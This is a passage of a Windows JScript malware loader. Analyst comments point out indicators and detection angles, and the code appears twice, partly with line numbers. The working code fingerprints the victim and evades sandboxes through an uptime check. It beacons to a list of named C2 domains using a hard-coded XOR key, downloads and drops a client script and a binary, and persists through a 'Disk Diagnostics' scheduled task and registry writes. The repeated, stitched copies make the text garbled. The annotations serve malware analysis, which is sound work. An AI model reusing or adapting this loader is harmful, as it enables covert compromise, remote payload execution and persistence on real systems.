  // SaveToFile/Close. This is how the downloaded plugin host reaches disk as %temp%\<uid>.bin.
  537. function Base64bytes(string){
  538. var XmlDOM = WScript.CreateObject("MSXml2.DOMDocument");
  539. var element = XmlDOM.createElement("Base64Data");
  540. element.dataType = "bin.base64";
  541.  
  542. element.text = string;
  543.  
  544. var stream = WScript.CreateObject("ADODB.Stream");
  545. stream.Type = 1;
  546. stream.Open();
  547.  
  548. stream.Write(element.nodeTypedValue);
  549. return stream;
  550. }
  551.  
  // Base64-encodes a string via MSXML bin.base64, stripping MSXML's line breaks and every literal
  // "//". The "//" removal is lossy and must be mirrored when decoding captured check-ins.
  552. function Base64Encode(string) {
  553.  
  554. var XmlDOM = WScript.CreateObject("MSXml2.DOMDocument");
  555. var element = XmlDOM.createElement("Base64Data");
  556. element.dataType = "bin.base64";
  557.  
  558. element.nodeTypedValue = StringToBinary(string);
  559.  
  560. return element.text.replace(/\n/g, "").replace(/\/\//g, "");
  561. }
  562.  
  563.  
  // Entry point guard: run the initial check-in only when executed standalone. When this source is
  // eval()'d by the client stage, CLIENT_IMPORT_ENV is already defined and nothing runs here.
  564. if(typeof(CLIENT_IMPORT_ENV) == typeof(undefined)){
  565. Loader.DeployClient();
  566. }
  // Analyst note: second verbatim copy of the WebLib32 loader source as it appears in the dump
  // (the value is the script's own file contents, written back by Loader.Persist). C2 list, build
  // tag and obfuscation key are identical to the copy above.
  567. var config = {
  568. PRIMARY_C2 : ['http://az361816.vo.msecnd.net','http://msnbot-207-46-194-33.search.msn.com','http://ec.atdmt.com','http://a-zcorner.com','http://knockoutlights.com','http://organicgreensfl.com','http://d0d0f3d189430.com','http://d0d0abee1d18255e.com'],
  569. SOFT_SIG : 'mad29',
  570. SOFT_VERSION: 32,
  571. C2_REQUEST_SLEEP : 21, // seconds between check-in attempts
  572. C2_FAIL_SLEEP : 21, // not referenced by the loader code on this page
  573. C2_FAIL_COUNT : 20, // outer retry count in Loader.DeployClient
  574. C2_OB_KEY : 'JxTRG4mY', // XOR key material shared with the client stage
  575.  
  576.  
  577. C2_PREFIX : 'rpc.aspx' // check-in endpoint path
  578. }
  579.  
  580.  
  // Overwritten with the responding host in Loader.DeployClient; persisted as "ShimV4".
  581. var SELECTED_C2 = config.PRIMARY_C2[0];
  582.  
  583.  
  // 32-bit multiply shim for the legacy JScript engine (presumably lacks Math.imul); used by DataTools.Hash.
  584. Math.imul = function (a, b) {
  585. var ah = (a >>> 16) & 0xffff;
  586. var al = a & 0xffff;
  587. var bh = (b >>> 16) & 0xffff;
  588. var bl = b & 0xffff;
  589. return ((al * bl) + (((ah * bl + al * bh) << 16) >>> 0) | 0);
  590. };
  591.  
  592.  
  // Host IoC table: registry root, schtasks/wmic command templates, drop paths, persistence task name.
  593. var GlobalStrings = {
  594. REG_ROOT : "HKEY_CURRENT_USER\\Software\\ApplicationContainer\\Appsw64\\",
  595. WMIC_EXEC_ARGS : "wmic process call create \"%path% %args%\"",
  596. WMIC_EXEC : "wmic process call create \"%path%\"",
  597. TASK_CREATE : "schtasks /Create /F /TN \"%name%\" /TR \"%command%\" /SC Once /ST %time%",
  598. TASK_LOOP_CREATE : "schtasks /Create /F /TN \"%name%\" /TR \"%command%\" /SC Minute /MO %timeout%",
  599. NTFILE_PATH : "C:\\Users\\Public\\diskdiag.ini", // decoy file; payloads live in its alternate data streams
  600. ADS_SSID : "HDDScan", // not referenced by the code on this page
  601. PERSIST_COMMAND : "explorer.exe C:\\Users\\Public\\Disk0.js",
  602. TASK_NAME : "Disk Diagnostics"
  603. }
  604.  
  605.  
  // ActiveXObject factory keyed by symbolic name (ProgIDs kept in one table).
  606. var ObjectProducer = {}
  607. ObjectProducer.AccesibleObjects = {
  608. MAIN_SH_OBJECT : 'WScript.Shell',
  609. STREAM_ACCESS_OBJECT : 'ADODB.Stream',
  610. XML_TREE_OBJECT : 'Microsoft.XMLDOM',
  611. XML_TREE_V2_OBJECT : 'MSXml2.DOMDocument',
  612. HTTP_CLIENT_OBJECT : 'MSXML2.XMLHTTP',
  613. FS_DRIVE_OBJECT : 'Scripting.FileSystemObject'
  614. };
  615.  
  616. ObjectProducer.GetRootConstructor = function(){
  617. return ActiveXObject;
  618. }
  619.  
  // Returns `new ActiveXObject(<ProgID for instanceKey>)`.
  620. ObjectProducer.GetInstance = function(instanceKey){
  621. var rootConstructor = ObjectProducer.GetRootConstructor();
  622. return new rootConstructor(ObjectProducer.AccesibleObjects[instanceKey]);
  623. }
  624.  
  625.  
  626.  
  // Encoding helpers. The only "encryption" is a single-byte XOR (RotString) keyed by the digit sum
  // produced by DeriveKey, derivable from cleartext URL parameters plus the hard-coded C2_OB_KEY.
  627. var DataTools = {};
  628. DataTools.KEY_BASE = 1029;
  629.  
  // XOR-folds keyStr into KEY_BASE and returns the decimal digit sum of the result (a small integer).
  630. DataTools.DeriveKey = function(keyStr){
  631. var keyBase = DataTools.KEY_BASE;
  632. var key = 0;
  633.  
  634. for(var i = 0; i < keyStr.length; i++){
  635. keyBase = keyBase ^ keyStr.charCodeAt(i);
  636. }
  637.  
  638. var _keyBase = keyBase.toString();
  639. for(var i = 0; i < _keyBase.length; i++){
  640. key += parseInt(_keyBase.charAt(i));
  641. }
  642.  
  643. return key;
  644. }
  645.  
  // Per-character XOR with a constant integer key (symmetric; not a rotation).
  646. DataTools.RotString = function(str, key){
  647. var rotd = "";
  648. for(var i = 0; i < str.length; i++){
  649. rotd = rotd.concat(String.fromCharCode((str.charCodeAt(i) ^ key)));
  650. }
  651.  
  652. return rotd;
  653. }
  654.  
  // Multiply-XOR string hash (seed 0xdeadbeef, multiplier 2654435761) as lowercase hex; basis of the victim uid.
  655. DataTools.Hash = function(str){
  656. for(var i = 0, h = 0xdeadbeef; i < str.length; i++)
  657. h = Math.imul(h ^ str.charCodeAt(i), 2654435761);
  658.  
  659. return ((h ^ h >>> 16) >>> 0).toString(16);
  660. }
  661.  
  662. DataTools.Random = {};
  // Uniform integer in [min, max] from Math.random.
  663. DataTools.Random.Number = function(min, max){
  664. min = Math.ceil(min);
  665. max = Math.floor(max);
  666. return Math.floor(Math.random() * (max - min + 1)) + min;
  667. }
  668.  
  // Random lowercase [a-z] string of length len (nonces, decoy parameters, decoy file filler).
  669. DataTools.Random.String = function(len){
  670. var alphabet = "qwertyuiopasdfghjklzxcvbnm";
  671. var result = "";
  672. for(var i = 0; i < len; i++){
  673. var chr = DataTools.Random.Number(0, alphabet.length-1);
  674. result = result.concat(alphabet.charAt(chr));
  675. }
  676.  
  677. return result;
  678. }
  679.  
  680.  
  681. DataTools.Strings = {};
  // Substitutes %key% placeholders from a "k=v&k=v" template; first occurrence of each only.
  682. DataTools.Strings.ParseTemplate = function(str, templateStr){
  683. var template = templateStr.split('&');
  684. for(var i = 0; i < template.length; i++){
  685. var keyValue = template[i].split('=');
  686. str = str.replace('%'.concat(keyValue[0]).concat('%'), keyValue[1]);
  687. }
  688.  
  689. return str;
  690. }
  691.  
  // OS layer over WScript.Shell, FileSystemObject and WMI. Windows.Execute (WScript.Shell.Run) is
  // the single choke point through which schtasks.exe and wmic.exe are launched.
  692. var Windows = {};
  693. Windows.CoMainObject = ObjectProducer.GetInstance('MAIN_SH_OBJECT');
  694. Windows.FsIoObject = ObjectProducer.GetInstance('FS_DRIVE_OBJECT');
  695.  
  696. Windows.Execute = function(command){
  697. Windows.CoMainObject.Run(command);
  698. }
  699.  
  700. Windows.GetEnv = function(env){
  701. return Windows.CoMainObject.ExpandEnvironmentStrings(env);
  702. }
  703.  
  704. Windows.RegRead = function(path){
  705. return Windows.CoMainObject.RegRead(path);
  706. }
  707.  
  // Writes are always under HKCU\Software\ApplicationContainer\Appsw64\ (GlobalStrings.REG_ROOT).
  708. Windows.RegWrite = function(entry, value){
  709. Windows.CoMainObject.RegWrite(GlobalStrings.REG_ROOT.concat(entry), value);
  710. }
  711.  
  // Decoy text file filled with 1024 random letters (host for the payload alternate data streams).
  712. Windows.CreateFile = function(path){
  713. var fHandle = Windows.FsIoObject.CreateTextFile(path, 2, true);
  714. fHandle.WriteLine(DataTools.Random.String(1024));
  715. fHandle.Close();
  716. }
  717.  
  // Text write into ADS path:stream; not referenced on this page.
  718. Windows.AppendDataStream = function(path, stream, data){
  719. var fHandle = Windows.FsIoObject.CreateTextFile(path.concat(":").concat(stream), 2, true);
  720. fHandle.WriteLine(data);
  721. fHandle.Close();
  722. }
  723.  
  // Binary write into ADS path:stream (same as WriteDataStreamBytes); not referenced on this page.
  724. Windows.AppendDataStreamB = function(path, stream, data){
  725. data.SaveToFile(path.concat(":").concat(stream), 2);
  726. data.Close();
  727. }
  728.  
  // Plain text file write; used for C:\Users\Public\Disk0.js.
  729. Windows.WriteData = function(path, data){
  730. var fHandle = Windows.FsIoObject.CreateTextFile(path, true);
  731. fHandle.Write(data);
  732. fHandle.Close();
  733. }
  734.  
  // Saves and closes an ADODB.Stream (overwrite); used for %temp%\<uid>.bin.
  735. Windows.WriteBytes = function(path, data){
  736. data.SaveToFile(path, 2);
  737. data.Close();
  738. }
  739.  
  // Saves an ADODB.Stream into ADS path:stream; detection angle is a write target containing ':'.
  740. Windows.WriteDataStreamBytes = function(path, stream, data){
  741. data.SaveToFile(path.concat(":").concat(stream), 2);
  742. data.Close();
  743. }
  744.  
  // Reads a whole text file (used to copy the running script into the WebLib32 value); handle not closed.
  745. Windows.ReadFile = function(path){
  746. var fHandle = Windows.FsIoObject.OpenTextFile(path, 1);
  747. return fHandle.ReadAll();
  748. }
  749.  
  // WMI root\cimv2 connection to pcname ("." = local).
  750. Windows.GetWMIProvider = function(pcname){
  751. return GetObject("winmgmts:"+
  752. "{impersonationLevel=impersonate}!\\\\" + pcname + "\\root\\cimv2");
  753. }
  754.  
  // SystemUpTime from Win32_PerfFormattedData_PerfOS_System, or 0 on any WMI error.
  755. Windows.GetUptime = function(){
  756. try{
  757. var wmi = Windows.GetWMIProvider(".");
  758. var queryResult = wmi.ExecQuery("select * from Win32_PerfFormattedData_PerfOS_System");
  759. var e = new Enumerator(queryResult);
  760.  
  761. return parseInt(e.item().SystemUpTime);
  762. }catch(e){
  763. return 0;
  764. }
  765. }
  766.  
  // Returns "32" only when ProductName contains "Windows 7", else "64" (not a real architecture check).
  767. Windows.GetArch = function(){
  768. var architecture = "64";
  769. var product = Windows.RegRead("HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows NT\\CurrentVersion\\ProductName");
  770.  
  771. if(product.indexOf('Windows 7') != -1){
  772. architecture = "32";
  773. }
  774.  
  775. return architecture;
  776. }
  777.  
  778.  
  // Synchronous GET via one shared MSXML2.XMLHTTP; "" on non-200 or exception, so failures are silent.
  779. var Http = {};
  780. Http.Client = ObjectProducer.GetInstance('HTTP_CLIENT_OBJECT');
  781. Http.Request = function(url){
  782. try{
  783. Http.Client.Open('GET', url, false);
  784. Http.Client.Send();
  785.  
  786. if(Http.Client.Status == 200)
  787. return Http.Client.ResponseText;
  788. else
  789. return "";
  790. }catch(e){
  791. return ""
  792. }
  793. }
  794.  
  795.  
  // Host fingerprint (collected once) and check-in URL construction.
  796. var Loader = {};
  797. Loader.USERNAME = Windows.GetEnv("%username%");
  798. Loader.PCNAME = Windows.GetEnv("%COMPUTERNAME%");
  799. Loader.DOMAIN = Windows.GetEnv("%USERDOMAIN%");
  800. Loader.Uptime = Windows.GetUptime();
  // "true" when USERDOMAIN differs from COMPUTERNAME (domain-joined host).
  801. Loader.MachineType = (Loader.PCNAME.toUpperCase() != Loader.DOMAIN.toUpperCase()).toString();
  802.  
  // Deterministic victim id: hex hash of fingerprint + build tag, with SOFT_VERSION appended as text.
  803. Loader.GetUid = function(){
  804. return DataTools.Hash(Loader.USERNAME+Loader.PCNAME+Loader.DOMAIN+Loader.MachineType+config.SOFT_VERSION+config.SOFT_SIG) + config.SOFT_VERSION;
  805. }
  806.  
  // Colon-joined fingerprint, XORed with DeriveKey(nonce + C2_OB_KEY), base64- then URL-encoded.
  // The nonce is sent in clear ("ubwG"), so the blob is decodable offline given C2_OB_KEY.
  807. Loader.GetInitialRequest = function(nonce){
  808. var uid = Loader.GetUid();
  809. var request = [Loader.USERNAME, Loader.PCNAME, Loader.DOMAIN, Loader.MachineType, uid, config.SOFT_SIG, config.SOFT_VERSION, Loader.Uptime];
  810.  
  811. var sessionKey = nonce + config.C2_OB_KEY;
  812. request = request.join(":");
  813. request = DataTools.RotString(request, DataTools.DeriveKey(sessionKey));
  814. request = Base64Encode(request);
  815.  
  816. return encodeURIComponent(request);
  817. }
  818.  
  // /rpc.aspx?winrm=2387&view2=classic&regclid=<blob>&client=<random>&service_id=FE0<n>&ubwG=<nonce>;
  // the fixed tokens are URI signature material.
  819. Loader.GetInitialEndpoint = function(){
  820. var nonce = DataTools.Random.String(12)
  821. var request = Loader.GetInitialRequest(nonce);
  822.  
  823. var endpoint = "/" + config.C2_PREFIX + "?winrm=2387&view2=classic&regclid=" + request + "&client=" + DataTools.Random.String(31) + "&service_id=FE0" + DataTools.Random.Number(1,10000) + "&ubwG=" + nonce;
  824. return endpoint;
  825. }
  826.  
  // Fetches the plugin host binary from SELECTED_C2/go.aspx (XOR-decoded, then base64) and drops it
  // as %temp%\<uid>.bin; returns that path. An empty HTTP response still creates an empty file.
  827. Loader.DeployHost = function(){
  828. var temp = Windows.GetEnv("%temp%");
  829. var architecture = Windows.GetArch();
  830. var nonce = DataTools.Random.String(12);
  831. var uid = Loader.GetUid();
  832. var sessionKey = nonce + config.C2_OB_KEY;
  833.  
  834. var encodedId = DataTools.RotString(uid, DataTools.DeriveKey(sessionKey));
  835. encodedId = Base64Encode(encodedId);
  836. encodedId = encodeURIComponent(encodedId);
  837.  
  // Fixed tokens goal=6E and e6_endpoint=29283291210281_2 are usable for URI detection.
  838. var pluginHost = Http.Request(SELECTED_C2 + "/go.aspx?link=" + DataTools.Random.String(4) +"&goal=6E&r_ctplGuid=" + encodedId + "&TS2=" + nonce + "&rtag=" + architecture + "&e6_endpoint=29283291210281_2");
  839. pluginHost = DataTools.RotString(pluginHost, DataTools.DeriveKey(uid.concat(config.C2_OB_KEY)));
  840.  
  841. var filename = uid.concat(".bin");
  842.  
  843. Windows.WriteBytes(temp.concat("\\").concat(filename), Base64bytes(pluginHost));
  844. return temp.concat("\\").concat(filename);
  845.  
  846. }
  847.  
  // Standalone entry: quits when WMI uptime <= 3000 (or WMI failed, since GetUptime returns 0) —
  // presumably an anti-sandbox gate. Then polls each PRIMARY_C2 host up to C2_FAIL_COUNT rounds;
  // on "<<<CLIENT__" it decodes the client stage, records host (ShimV4) and uid (SetupServiceKey)
  // in the registry, selects that host and calls Loader.Persist. All exceptions are swallowed.
  848. Loader.DeployClient = function() {
  849. if (Loader.Uptime <= 3000) {
  850. WScript.Quit(0);
  851. }
  852.  
  853. for (var i = 0; i < config.C2_FAIL_COUNT; i++) {
  854. for (var j = 0; j < config.PRIMARY_C2.length; j++) {
  855. try {
  856. var response = Http.Request(config.PRIMARY_C2[j] + Loader.GetInitialEndpoint());
  857. response = DataTools.RotString(response, DataTools.DeriveKey(Loader.GetUid().concat(config.C2_OB_KEY)));
  858.  
  859. if (response.indexOf('<<<CLIENT__') !== -1) {
  860. var client = response.replace('<<<CLIENT__', '');
  861. client = Base64text(client);
  862.  
  863. Windows.RegWrite("ShimV4", config.PRIMARY_C2[j]);
  864. Windows.RegWrite("SetupServiceKey", Loader.GetUid());
  865.  
  866. SELECTED_C2 = config.PRIMARY_C2[j];
  867. Loader.Persist(client);
  868. return;
  869.  
  870. }
  871. } catch (e) {
  872.  
  873. }
  874.  
  875. WScript.Sleep(config.C2_REQUEST_SLEEP * 1000);
  876. }
  877. }
  878. }
  879.  
  // Persistence: "Disk Diagnostics" task running explorer.exe C:\Users\Public\Disk0.js every 6 min;
  // registry ServerUrl = client source, WebLib32 = this script's own file; decoy diskdiag.ini;
  // client dropped as Disk0.js; then DeployHost fetches the binary. Each artifact is a cleanup item.
  880. Loader.Persist = function(client){
  881.  
  882. var taskCommandTemplate = "name=".concat(GlobalStrings.TASK_NAME).concat("&command=").concat(GlobalStrings.PERSIST_COMMAND).concat("&timeout=6");
  883. var taskCommand = DataTools.Strings.ParseTemplate(GlobalStrings.TASK_LOOP_CREATE, taskCommandTemplate);
  884.  
  885. Windows.Execute(taskCommand);
  886. Windows.RegWrite("ServerUrl", client);
  887. Windows.RegWrite("WebLib32", Windows.ReadFile(WScript.ScriptFullName));
  888.  
  889. Windows.CreateFile(GlobalStrings.NTFILE_PATH);
  890.  
  891. Windows.WriteData("C:\\Users\\Public\\Disk0.js", client);
  892.  
  893. Loader.DeployHost();
  894. }
  895.  
  // Developer leftover: WScript.Shell popup. Not called on this page.
  896. function debug(message){
  897. ObjectProducer.GetInstance('MAIN_SH_OBJECT').Popup(message);
  898. }
  899.  
  900.  
  // base64 -> UTF-8 text via MSXML bin.Base64 and an ADODB.Stream binary/text round trip.
  901. function Base64text(string){
  902. var XmlDOM = new ActiveXObject("Microsoft.XMLDOM");
  903. var element = XmlDOM.createElement("tempContainer");
  904. element.dataType = "bin.Base64";
  905. element.text = string;
  906.  
  907. var stream = WScript.CreateObject("ADODB.Stream");
  908. stream.Type = 1;
  909. stream.Open();
  910. stream.Write(element.nodeTypedValue);
  911.  
  912. stream.Position = 0;
  913. stream.Type = 2;
  914. stream.CharSet = "utf-8";
  915.  
  916. return stream.ReadText();
  917. }
  918.  
  // String -> byte array via an ASCII text write and binary re-read of an ADODB.Stream.
  919. function StringToBinary(string){
  920. var BinaryStream = new ActiveXObject("ADODB.Stream");
  921. BinaryStream.Type = 2;
  922. BinaryStream.CharSet = "ascii";
  923. BinaryStream.Open();
  924. BinaryStream.WriteText(string);
  925. BinaryStream.Position = 0;
  926. BinaryStream.Type = 1;
  927. BinaryStream.Position = 0;
  928. return BinaryStream.Read();
  929. }
  930.  
  931.  
  932. function Base64bytes(string){
  933. var XmlDOM = WScript.CreateObject("MSXml2.DOMDocument");
  934. var element = XmlDOM.createElement("Base64Data");
  935. element.dataType = "bin.base64";
  936.  
  937. element.text = string;
  938.  
  939. var stream = WScript.CreateObject("ADODB.Stream");
  940. stream.Type = 1;
  941. stream.Open();
  942.  
  943. stream.Write(element.nodeTypedValue);
  944. return stream;
  945. }
  946.  
  947. function Base64Encode(string) {
  948.  
  949. var XmlDOM = WScript.CreateObject("MSXml2.DOMDocument");
  950. var element = XmlDOM.createElement("Base64Data");
  951. element.dataType = "bin.base64";
  952.  
  953. element.nodeTypedValue = StringToBinary(string);
  954.  
  955. return element.text.replace(/\n/g, "").replace(/\/\//g, "");
  956. }
  957.  
  958.  
  959. if(typeof(CLIENT_IMPORT_ENV) == typeof(undefined)){
  960. Loader.DeployClient();
  961. }
// Loader configuration. Every field below is read elsewhere in this copy of
// the script; field names are the identifiers the rest of the code uses.
var config = {
// Hosts polled in order by Loader.DeployClient; the first one that answers
// with a '<<<CLIENT__' response is stored in the registry as "ShimV4".
// NOTE(review): the msecnd.net, search.msn.com and atdmt.com entries look like
// Microsoft-operated hostnames, presumably present so failed beacons blend in
// with ordinary traffic; treat them as noise, not as blockable indicators.
PRIMARY_C2 : ['http://az361816.vo.msecnd.net','http://msnbot-207-46-194-33.search.msn.com','http://ec.atdmt.com','http://a-zcorner.com','http://knockoutlights.com','http://organicgreensfl.com','http://d0d0f3d189430.com','http://d0d0abee1d18255e.com'],
// Campaign tag and build number; both feed Loader.GetUid and the beacon body.
SOFT_SIG : 'mad29',
SOFT_VERSION: 32,
// Seconds slept after every polling attempt (multiplied by 1000 in DeployClient).
C2_REQUEST_SLEEP : 21,
// Not referenced anywhere in this copy of the script.
C2_FAIL_SLEEP : 21,
// Number of full passes over PRIMARY_C2 before DeployClient gives up.
C2_FAIL_COUNT : 20,
// Static secret appended to a per-request nonce (or to the uid) before
// DataTools.DeriveKey turns it into the XOR key for request/response bodies.
C2_OB_KEY : 'JxTRG4mY',


// Path component of the check-in URL built by Loader.GetInitialEndpoint.
C2_PREFIX : 'rpc.aspx'
}
  974.  
  975.  
// Host used by Loader.DeployHost. Defaults to the first list entry and is
// overwritten by Loader.DeployClient with whichever host actually answered.
var SELECTED_C2 = config.PRIMARY_C2[0];
  977.  
  978.  
// 32-bit integer multiply, installed unconditionally (it replaces any native
// Math.imul). Presumably a polyfill for the WSH JScript engine, which
// predates ES2015 — TODO confirm. Only consumer here is DataTools.Hash.
Math.imul = function (a, b) {
var ah = (a >>> 16) & 0xffff;
var al = a & 0xffff;
var bh = (b >>> 16) & 0xffff;
var bl = b & 0xffff;
// Low 16x16 product plus the cross terms shifted up; the final `| 0`
// truncates to a signed 32-bit result.
return ((al * bl) + (((ah * bl + al * bh) << 16) >>> 0) | 0);
};
  986.  
  987.  
// Host artifacts. These are the on-disk / registry / scheduled-task names a
// responder would look for; several entries are defined but never used in
// this copy of the script (WMIC_EXEC_ARGS, WMIC_EXEC, TASK_CREATE, ADS_SSID).
var GlobalStrings = {
// Every Windows.RegWrite call is prefixed with this path.
REG_ROOT : "HKEY_CURRENT_USER\\Software\\ApplicationContainer\\Appsw64\\",
WMIC_EXEC_ARGS : "wmic process call create \"%path% %args%\"",
WMIC_EXEC : "wmic process call create \"%path%\"",
TASK_CREATE : "schtasks /Create /F /TN \"%name%\" /TR \"%command%\" /SC Once /ST %time%",
// Template filled by Loader.Persist: %name% = TASK_NAME, %command% =
// PERSIST_COMMAND, %timeout% = 6, i.e. a task that fires every 6 minutes.
TASK_LOOP_CREATE : "schtasks /Create /F /TN \"%name%\" /TR \"%command%\" /SC Minute /MO %timeout%",
// Filler file written by Windows.CreateFile with 1024 random letters.
NTFILE_PATH : "C:\\Users\\Public\\diskdiag.ini",
ADS_SSID : "HDDScan",
// Scheduled-task action: explorer.exe re-launches the dropped JS file.
PERSIST_COMMAND : "explorer.exe C:\\Users\\Public\\Disk0.js",
// Scheduled-task name as it appears in Task Scheduler.
TASK_NAME : "Disk Diagnostics"
}
  999.  
  1000.  
// Indirection layer over ActiveXObject: COM ProgIDs are looked up by symbolic
// key so the strings appear once. (Note the misspelled identifier
// "AccesibleObjects" is the real property name used throughout.)
var ObjectProducer = {}
ObjectProducer.AccesibleObjects = {
MAIN_SH_OBJECT : 'WScript.Shell',
STREAM_ACCESS_OBJECT : 'ADODB.Stream',
XML_TREE_OBJECT : 'Microsoft.XMLDOM',
XML_TREE_V2_OBJECT : 'MSXml2.DOMDocument',
HTTP_CLIENT_OBJECT : 'MSXML2.XMLHTTP',
FS_DRIVE_OBJECT : 'Scripting.FileSystemObject'
};

// Returns the constructor used by GetInstance; always ActiveXObject here.
ObjectProducer.GetRootConstructor = function(){
return ActiveXObject;
}

// Instantiates the COM object registered under `instanceKey`.
// An unknown key passes `undefined` to the constructor and throws.
ObjectProducer.GetInstance = function(instanceKey){
var rootConstructor = ObjectProducer.GetRootConstructor();
return new rootConstructor(ObjectProducer.AccesibleObjects[instanceKey]);
}
  1019.  
  1020.  
  1021.  
// String-encoding helpers used for the beacon body and C2 responses.
var DataTools = {};
// Seed for DeriveKey.
DataTools.KEY_BASE = 1029;

// Derives a small integer XOR key from a string: XOR-folds every char code
// into KEY_BASE, then sums the decimal digits of the result. Because the
// output is a digit sum, the key space is tiny (a handful of bits), which is
// what makes captured traffic trivially recoverable for analysis.
DataTools.DeriveKey = function(keyStr){
var keyBase = DataTools.KEY_BASE;
var key = 0;

for(var i = 0; i < keyStr.length; i++){
keyBase = keyBase ^ keyStr.charCodeAt(i);
}

var _keyBase = keyBase.toString();
for(var i = 0; i < _keyBase.length; i++){
key += parseInt(_keyBase.charAt(i));
}

return key;
}

// XORs every char code of `str` with `key`. Symmetric: the same call both
// encodes outgoing requests and decodes C2 responses.
DataTools.RotString = function(str, key){
var rotd = "";
for(var i = 0; i < str.length; i++){
rotd = rotd.concat(String.fromCharCode((str.charCodeAt(i) ^ key)));
}

return rotd;
}

// 32-bit multiplicative string hash (seed 0xdeadbeef, multiplier
// 2654435761 = 0x9E3779B1) returned as lowercase hex. Used by Loader.GetUid
// to build the host identifier; not a cryptographic hash.
DataTools.Hash = function(str){
for(var i = 0, h = 0xdeadbeef; i < str.length; i++)
h = Math.imul(h ^ str.charCodeAt(i), 2654435761);

return ((h ^ h >>> 16) >>> 0).toString(16);
}
  1056.  
// Randomness and template helpers.
DataTools.Random = {};
// Uniform integer in the inclusive range [min, max] (Math.random based, so
// nonces produced from it are not unpredictable in any cryptographic sense).
DataTools.Random.Number = function(min, max){
min = Math.ceil(min);
max = Math.floor(max);
return Math.floor(Math.random() * (max - min + 1)) + min;
}

// Random string of `len` lowercase ASCII letters (the alphabet covers all 26).
// Used for the request nonce, URL padding parameters and the diskdiag.ini
// filler — so those fields are all-lowercase-alpha, a useful matching hint.
DataTools.Random.String = function(len){
var alphabet = "qwertyuiopasdfghjklzxcvbnm";
var result = "";
for(var i = 0; i < len; i++){
var chr = DataTools.Random.Number(0, alphabet.length-1);
result = result.concat(alphabet.charAt(chr));
}

return result;
}


DataTools.Strings = {};
// Substitutes %key% placeholders in `str` from a "k1=v1&k2=v2" template.
// String.replace with a string pattern replaces only the first occurrence of
// each placeholder; values containing '&' or '=' would be split incorrectly.
DataTools.Strings.ParseTemplate = function(str, templateStr){
var template = templateStr.split('&');
for(var i = 0; i < template.length; i++){
var keyValue = template[i].split('=');
str = str.replace('%'.concat(keyValue[0]).concat('%'), keyValue[1]);
}

return str;
}
  1086.  
// Thin wrappers over WScript.Shell and Scripting.FileSystemObject. Both COM
// objects are created once at load time, so instantiation of these ProgIDs
// from a wscript/cscript host is the earliest observable of this script.
var Windows = {};
Windows.CoMainObject = ObjectProducer.GetInstance('MAIN_SH_OBJECT');
Windows.FsIoObject = ObjectProducer.GetInstance('FS_DRIVE_OBJECT');

// Runs a command line via WScript.Shell.Run with default window style and
// without waiting for it to finish (no extra arguments are passed).
Windows.Execute = function(command){
Windows.CoMainObject.Run(command);
}

// Expands %VAR% references (used for username, computer name, domain, temp).
Windows.GetEnv = function(env){
return Windows.CoMainObject.ExpandEnvironmentStrings(env);
}

// Reads an arbitrary full registry path.
Windows.RegRead = function(path){
return Windows.CoMainObject.RegRead(path);
}

// Writes `value` under GlobalStrings.REG_ROOT + entry, i.e. every write lands
// in HKCU\Software\ApplicationContainer\Appsw64\. No value type is given, so
// WScript.Shell picks one from the JScript type (presumably REG_SZ for the
// strings written here — TODO confirm).
Windows.RegWrite = function(entry, value){
Windows.CoMainObject.RegWrite(GlobalStrings.REG_ROOT.concat(entry), value);
}
  1106.  
// Creates/overwrites `path` and fills it with 1024 random lowercase letters
// plus a line break. Only caller passes GlobalStrings.NTFILE_PATH
// (C:\Users\Public\diskdiag.ini); the content looks like padding, not data.
// CreateTextFile(path, 2, true): overwrite on, Unicode on.
Windows.CreateFile = function(path){
var fHandle = Windows.FsIoObject.CreateTextFile(path, 2, true);
fHandle.WriteLine(DataTools.Random.String(1024));
fHandle.Close();
}

// Writes text into the NTFS alternate data stream `path:stream`.
// Not referenced in this copy of the script.
Windows.AppendDataStream = function(path, stream, data){
var fHandle = Windows.FsIoObject.CreateTextFile(path.concat(":").concat(stream), 2, true);
fHandle.WriteLine(data);
fHandle.Close();
}

// Saves an ADODB.Stream into the alternate data stream `path:stream` and
// closes the stream. Not referenced in this copy of the script.
Windows.AppendDataStreamB = function(path, stream, data){
data.SaveToFile(path.concat(":").concat(stream), 2);
data.Close();
}

// Overwrites `path` with `data` as text (CreateTextFile overwrite flag set,
// default ANSI). Loader.Persist uses this to drop C:\Users\Public\Disk0.js.
Windows.WriteData = function(path, data){
var fHandle = Windows.FsIoObject.CreateTextFile(path, true);
fHandle.Write(data);
fHandle.Close();
}

// Persists an open ADODB.Stream to `path` (SaveToFile mode 2 = create or
// overwrite) and closes it. Loader.DeployHost uses this for %temp%\<uid>.bin.
Windows.WriteBytes = function(path, data){
data.SaveToFile(path, 2);
data.Close();
}

// Same as WriteBytes but targets the alternate data stream `path:stream`.
// Not referenced in this copy of the script.
Windows.WriteDataStreamBytes = function(path, stream, data){
data.SaveToFile(path.concat(":").concat(stream), 2);
data.Close();
}

// Reads a whole text file (OpenTextFile mode 1 = ForReading). The handle is
// never closed explicitly. Loader.Persist reads the running script with it.
Windows.ReadFile = function(path){
var fHandle = Windows.FsIoObject.OpenTextFile(path, 1);
return fHandle.ReadAll();
}
  1144.  
// Binds to the WMI cimv2 namespace on `pcname` via the winmgmts moniker.
// Only caller passes "." (local machine).
Windows.GetWMIProvider = function(pcname){
return GetObject("winmgmts:"+
"{impersonationLevel=impersonate}!\\\\" + pcname + "\\root\\cimv2");
}

// System uptime from Win32_PerfFormattedData_PerfOS_System.SystemUpTime,
// or 0 if the WMI query fails for any reason. Loader.DeployClient quits when
// this is <= 3000, so a failed/blocked WMI query has the same effect as a
// freshly booted host: the loader never beacons. Analysts should expect
// short-uptime sandboxes to see no network activity from this sample.
Windows.GetUptime = function(){
try{
var wmi = Windows.GetWMIProvider(".");
var queryResult = wmi.ExecQuery("select * from Win32_PerfFormattedData_PerfOS_System");
var e = new Enumerator(queryResult);

return parseInt(e.item().SystemUpTime);
}catch(e){
return 0;
}
}

// Despite the name this is an OS-version check, not an architecture probe:
// it returns "32" only when ProductName contains "Windows 7" and "64"
// otherwise. The value is sent as the `rtag` parameter by Loader.DeployHost.
// A missing ProductName value makes RegRead throw; nothing here catches it.
Windows.GetArch = function(){
var architecture = "64";
var product = Windows.RegRead("HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows NT\\CurrentVersion\\ProductName");

if(product.indexOf('Windows 7') != -1){
architecture = "32";
}

return architecture;
}
  1172.  
  1173.  
// Minimal HTTP client over a single shared MSXML2.XMLHTTP instance.
var Http = {};
